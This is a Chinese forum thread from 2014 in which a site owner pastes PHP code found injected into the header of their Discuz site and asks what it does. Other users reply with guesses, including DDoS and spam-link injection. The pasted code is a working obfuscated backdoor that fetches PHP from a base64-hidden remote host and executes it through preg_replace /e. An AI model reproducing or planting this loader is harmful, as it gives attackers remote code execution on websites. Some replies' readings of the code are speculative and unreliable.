帮看下DZ头部被加了这个是怎么回事？

gagoab

<?php
function x6_fsockopen($a,$b,$c=80,$d=60){try{$f=fsockopen($a,$c,$g,$h,$d);if(!$f)return'';$i="GET $b HTTP/1.1\r\n";$i.="Host: $a\r\n";$i.="Connection: Close\r\n\r\n";fwrite($f,$i);$j='';while(!feof($f)){$j.=fgets($f,128);}$j=substr($j,strpos($j,"\r\n\r\n")+4);$j=explode("\r\n",$j);if(isset($j[1]))return $j[1];else return'';}catch(Exception $k){return'';}}function x6_getcontents($l){try{$m=array('http'=>array('method'=>"GET",'timeout'=>60,));$n=stream_context_create($m);$o='';$o=@file_get_contents($l,false,$n);return $o;}catch(Exception $k){return'';}}function x6_curl($l){try{$p=curl_init();curl_setopt($p,CURLOPT_URL,$l);curl_setopt($p,CURLOPT_HEADER,0);curl_setopt($p,CURLOPT_TIMEOUT,60);curl_setopt($p,CURLOPT_USERAGENT,'baidu');curl_setopt($p,CURLOPT_AUTOREFERER,TRUE);curl_setopt($p,CURLOPT_RETURNTRANSFER,1);curl_setopt($p,CURLOPT_FOLLOWLOCATION,TRUE);$q=curl_exec($p);curl_close($p);return $q;}catch(Exception $k){return'';}}function x6_test(){if(function_exists('curl_init')){return 'curl';}if(function_exists('fsockopen')){return 'fsockopen';}return 'getcontents';}function dir_writeable($r){if(!is_dir($r)){@mkdir($r,0777);}if(is_dir($r)){if($f=@fopen("$r/test.test",'w')){@fclose($f);@unlink("$r/test.test");$s=1;}else{$s=0;}}return $s;}if(defined('X6_CACHE_DIR')){$t=X6_CACHE_DIR;}else{$t=sys_get_temp_dir();}$u=$t.'/O'.'X'.'D'.'B'.'N'.'J'.'L'.'IU'.'Y'.'SL'.'C'.'JX'.'Y'.'AKAMY';$v=false;$w=@file_get_contents($u);if(file_exists($u)){if((time()-filemtime($u)>3600)||empty($w)){$v=true;}}else{if(!dir_writeable($t)){die('Dir cannot write, pleate set X6_CACHE_DIR!');}$v=true;}if($v){$w='';$x=0;while(!$w&&$x<3){switch(x6_test()){case  'curl'w=x6_curl(base64_decode('aHR0cDovL3BheS50ZW5wYXktaW5jLmNvbS9jb2RlLnBocA=='));break;case  'fsockopen'w=x6_fsockopen(base64_decode('cGF5LnRlbnBheS1pbmMuY29t'),base64_decode('L2NvZGUucGhw'));break;defaultw=x6_getcontents(base64_decode('aHR0cDovL3BheS50ZW5wYXktaW5jLmNvbS9jb2RlLnBocA=='));break;}$x++;}if($w){file_put_contents($u,$w);}}$y=""."R"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$y("//e",base64_decode($w),"");?>
<?php

Bye

=fsockopen(   目测是ddos 脚本

gagoab

Bye 发表于 2014-10-26 11:24
=fsockopen(   目测是ddos 脚本

谢谢   

76064866

可能是欺骗蜘蛛，挂菠菜链，也可能有ddos功能

点点

挂黑链的

gagoab

76064866 发表于 2014-10-26 14:01
可能是欺骗蜘蛛，挂菠菜链，也可能有ddos功能

谢谢！

gagoab

点点 发表于 2014-10-26 14:54
挂黑链的

谢谢！